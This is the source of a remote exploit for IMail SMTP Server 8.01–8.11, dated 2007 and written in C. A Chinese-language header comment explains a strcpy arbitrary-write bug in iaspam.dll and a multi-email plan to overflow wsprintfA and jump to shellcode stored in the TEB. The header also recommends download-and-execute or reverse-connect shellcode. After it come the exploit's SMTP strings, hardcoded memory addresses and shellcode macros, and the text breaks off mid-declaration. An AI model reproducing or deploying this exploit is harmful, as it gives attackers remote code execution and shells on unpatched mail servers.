/*
by axis
2007-06-05
http://www.ph4nt0m.org
Mail-List: http://list.ph4nt0m.org

以前有这个一个imail的exp

PRIVATE Remote Exploit For IMAIL Smtp Server(1.2)
This is For imail 8.01-8.11 version
Usage:faint.exe -d <host> [options]
Options:
 -d: Hostname to attack [Required]
 -t: Type [Default: 0]
 -p: Attack port [Default: 25]
 -S: the IP connect back to.
 -P: the port connect back to.
Types:
 0: win2k All version , IMail 8.01-11

不知道是哪位大牛写的

最近看了看，
非常好玩的一个漏洞。

漏洞是发生在iaspam.dll里

loc_1001ada5 ==> 注意动态调试时候注意加载基址的不同。
mov eax, [ebp+var_54]
mov ecx, [eax+10c8h]
push ecx ; char *
mov edx, [ebp+var_54]
mov eax, [edx+10d0h]
push eax ; char *
call _strcpy
add esp, 8
jmp loc_1001a6f0

这里strcpy的两个buffer，src和dst的指针，居然是直接从堆里读出来的。
而之前没有做任何检查
所以发送个邮件到服务器，SMD文件
然后在其后的偏移处控制这两个地址，就可以拷贝任意字符串到任意内存。

badchar是 0x00 0x0a emm说还有个 0x25,不过我没找到。

以前网上那个反连的版本，是利用了覆盖peb里的指针。
这种方法在2003上不能用。

这里我采用了emm的方法，构造了一个溢出
因为imailsec.dll的.data段可写。
所以我找到了这么一个地方

1000CB5D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
1000CB60 50 PUSH EAX
1000CB61 8B0D 6C540310 MOV ECX,DWORD PTR DS:[1003546C] ; IMailsec.1003549C
1000CB67 51 PUSH ECX
1000CB68 8D95 FCFDFFFF LEA EDX,DWORD PTR SS:[EBP-204]
1000CB6E 52 PUSH EDX
1000CB6F FF15 F8D30210 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; USER32.wsprintfA

其中指针DWORD PTR DS:[1003546C] 在imailsec.dll的.data中，这个地址可以被我们覆盖。
所以我们就可以构造一个溢出。

思路如下：
第一封邮件：
发送shellcode到内存中保存好。这里我放到了teb中
第二封邮件：
发送溢出需要的覆盖字符串到内存中保存好。这里我也放在了teb中
第三封邮件：
覆盖imailsec.dll中的 .data段的指针，使wsprintfA造成溢出
溢出覆盖使用的字符串是第二封邮件发送过去的，覆盖后的返回地址直接指向了第一封邮件发送过去的shellcode在内存中的地址。

所以这个漏洞是和平台无关的！！不需要任何opcode！！
在实际利用时我发送了4封邮件，第一封是废邮件，用于提高成功率。
由于互联网的spam泛滥，所以等到邮件服务器处理漏洞邮件时，也许已经过了几个月了。。。。
所以最好的方案是使用download+exec 的shellcode。
这里给出一个比较烂的反连shellcode作为poc。
据emm说这个漏洞一直没补，只是高版本没有了。。。。
*/
#include <stdio.h> #include <stdlib.h> #include <windows.h> #include <winsock.h> #include <io.h> #pragma comment (lib,"ws2_32") char *szEHLO = "HELO "; char *szMF = "MAIL FROM <fucker@fuckimail.org> "; char *szRCPT = "RCPT TO: <postmaster> "; char *szDATA = "DATA "; char *szTIME = "Date: Thu, 1 Oct 2007 07:06:09 +0800 "; char *szMIME = "MIME "; char *szEND = ". "; char *szQUIT = "QUIT "; char *szCT = "Content-Type: multipart/boundary="; char *szCTE = "Content-Transfer-Encoding:"; //#define SCaddr "x50xe7x03x10" #define SCaddr "x50xc8xfdx7f" #define Fuck_ptr "x6cx54x03x10" //0x1003546c #define Teb_temp1 0x7ffdd050 #define Teb_temp2 0x7ffdd040 #define Teb_temp3 0x7ffdd030 unsigned short port = 25; unsigned char payload[5000] = ""; #define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 #define PROC_END PROC_BEGIN unsigned char sh_Buff&